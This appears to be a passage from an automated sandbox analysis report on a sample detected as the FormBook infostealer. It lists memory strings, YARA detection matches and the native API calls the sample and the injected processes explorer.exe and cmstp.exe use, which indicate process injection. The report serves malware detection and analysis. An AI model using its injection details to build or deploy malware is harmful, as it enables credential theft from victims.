          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EBC
          Source: LWlcpDjYIQ.exe, 00000000.00000002.220096711.00000000007CA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004181B0 NtCreateFile,2_2_004181B0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00418260 NtReadFile,2_2_00418260
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004182E0 NtClose,2_2_004182E0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,2_2_00418390
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00418202 NtReadFile,2_2_00418202
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041838A NtAllocateVirtualMemory,2_2_0041838A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00A698F0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00A69860
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69840 NtDelayExecution,LdrInitializeThunk,2_2_00A69840
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A699A0 NtCreateSection,LdrInitializeThunk,2_2_00A699A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00A69910
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A20 NtResumeThread,LdrInitializeThunk,2_2_00A69A20
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00A69A00
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A50 NtCreateFile,LdrInitializeThunk,2_2_00A69A50
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A695D0 NtClose,LdrInitializeThunk,2_2_00A695D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69540 NtReadFile,LdrInitializeThunk,2_2_00A69540
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00A696E0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00A69660
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00A697A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,2_2_00A69780
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69FE0 NtCreateMutant,LdrInitializeThunk,2_2_00A69FE0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,2_2_00A69710
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A698A0 NtWriteVirtualMemory,2_2_00A698A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69820 NtEnumerateKey,2_2_00A69820
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A6B040 NtSuspendThread,2_2_00A6B040
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A699D0 NtCreateProcessEx,2_2_00A699D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69950 NtQueueApcThread,2_2_00A69950
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A80 NtOpenDirectoryObject,2_2_00A69A80
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A10 NtQuerySection,2_2_00A69A10
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A6A3B0 NtGetContextThread,2_2_00A6A3B0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69B00 NtSetValueKey,2_2_00A69B00
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A695F0 NtQueryInformationFile,2_2_00A695F0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69520 NtWaitForSingleObject,2_2_00A69520
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A6AD30 NtSetContextThread,2_2_00A6AD30
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69560 NtWriteFile,2_2_00A69560
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A696D0 NtCreateKey,2_2_00A696D0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69610 NtEnumerateValueKey,2_2_00A69610
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69670 NtQueryInformationProcess,2_2_00A69670
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69650 NtQueryValueKey,2_2_00A69650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_046B9860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9840 NtDelayExecution,LdrInitializeThunk,7_2_046B9840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9540 NtReadFile,LdrInitializeThunk,7_2_046B9540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_046B9910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B95D0 NtClose,LdrInitializeThunk,7_2_046B95D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B99A0 NtCreateSection,LdrInitializeThunk,7_2_046B99A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_046B9660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A50 NtCreateFile,LdrInitializeThunk,7_2_046B9A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9650 NtQueryValueKey,LdrInitializeThunk,7_2_046B9650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_046B96E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B96D0 NtCreateKey,LdrInitializeThunk,7_2_046B96D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9710 NtQueryInformationToken,LdrInitializeThunk,7_2_046B9710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9FE0 NtCreateMutant,LdrInitializeThunk,7_2_046B9FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9780 NtMapViewOfSection,LdrInitializeThunk,7_2_046B9780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BB040 NtSuspendThread,7_2_046BB040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9820 NtEnumerateKey,7_2_046B9820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B98F0 NtReadVirtualMemory,7_2_046B98F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B98A0 NtWriteVirtualMemory,7_2_046B98A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9560 NtWriteFile,7_2_046B9560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9950 NtQueueApcThread,7_2_046B9950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9520 NtWaitForSingleObject,7_2_046B9520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BAD30 NtSetContextThread,7_2_046BAD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B95F0 NtQueryInformationFile,7_2_046B95F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B99D0 NtCreateProcessEx,7_2_046B99D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9670 NtQueryInformationProcess,7_2_046B9670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A20 NtResumeThread,7_2_046B9A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A00 NtProtectVirtualMemory,7_2_046B9A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A10 NtQuerySection,7_2_046B9A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9610 NtEnumerateValueKey,7_2_046B9610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A80 NtOpenDirectoryObject,7_2_046B9A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9760 NtOpenProcess,7_2_046B9760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9770 NtSetInformationFile,7_2_046B9770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BA770 NtOpenThread,7_2_046BA770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9730 NtQueryVirtualMemory,7_2_046B9730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9B00 NtSetValueKey,7_2_046B9B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BA710 NtOpenProcessToken,7_2_046BA710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B97A0 NtUnmapViewOfSection,7_2_046B97A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BA3B0 NtGetContextThread,7_2_046BA3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_028582E0 NtClose,7_2_028582E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02858260 NtReadFile,7_2_02858260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02858390 NtAllocateVirtualMemory,7_2_02858390
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_028581B0 NtCreateFile,7_2_028581B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02858202 NtReadFile,7_2_02858202
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285838A NtAllocateVirtualMemory,7_2_0285838A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403166
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004046C30_2_004046C3
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004060D90_2_004060D9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004068B00_2_004068B0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004010262_2_00401026
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004012082_2_00401208
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00408C502_2_00408C50
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041C4FE2_2_0041C4FE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041CC902_2_0041CC90
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B55B2_2_0041B55B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00402D8A2_2_00402D8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041C76C2_2_0041C76C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B7C92_2_0041B7C9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041BF8A2_2_0041BF8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A02_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF20A82_2_00AF20A8
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B0902_2_00A3B090
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF28EC2_2_00AF28EC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AFE8242_2_00AFE824
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE10022_2_00AE1002
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A441202_2_00A44120
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2F9002_2_00A2F900
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF22AE2_2_00AF22AE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5EBB02_2_00A5EBB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE03DA2_2_00AE03DA
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEDBD22_2_00AEDBD2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF2B282_2_00AF2B28
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3841F2_2_00A3841F
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AED4662_2_00AED466
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A525812_2_00A52581
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3D5E02_2_00A3D5E0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF25DD2_2_00AF25DD
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A20D202_2_00A20D20
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF2D072_2_00AF2D07
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF1D552_2_00AF1D55
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF2EF72_2_00AF2EF7
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A46E302_2_00A46E30
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AED6162_2_00AED616
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF1FF12_2_00AF1FF1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AFDFCE2_2_00AFDFCE
          Source: C:\Windows\explorer.exeCode function: 5_2_064130625_2_06413062
          Source: C:\Windows\explorer.exeCode function: 5_2_0640E8F95_2_0640E8F9
          Source: C:\Windows\explorer.exeCode function: 5_2_064112FF5_2_064112FF
          Source: C:\Windows\explorer.exeCode function: 5_2_0640F3625_2_0640F362
          Source: C:\Windows\explorer.exeCode function: 5_2_0640E9025_2_0640E902
          Source: C:\Windows\explorer.exeCode function: 5_2_064113025_2_06411302
          Source: C:\Windows\explorer.exeCode function: 5_2_064147C75_2_064147C7
          Source: C:\Windows\explorer.exeCode function: 5_2_064155B25_2_064155B2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473D4667_2_0473D466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047310027_2_04731002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468841F7_2_0468841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047428EC7_2_047428EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A07_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047420A87_2_047420A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B0907_2_0468B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04741D557_2_04741D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04670D207_2_04670D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046941207_2_04694120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467F9007_2_0467F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04742D077_2_04742D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468D5E07_2_0468D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047425DD7_2_047425DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A25817_2_046A2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04696E307_2_04696E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04742EF77_2_04742EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047422AE7_2_047422AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04742B287_2_04742B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04741FF17_2_04741FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473DBD27_2_0473DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AEBB07_2_046AEBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02842FB07_2_02842FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285C76C7_2_0285C76C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285C4FE7_2_0285C4FE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02848C507_2_02848C50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02842D8A7_2_02842D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02842D907_2_02842D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B55B7_2_0285B55B
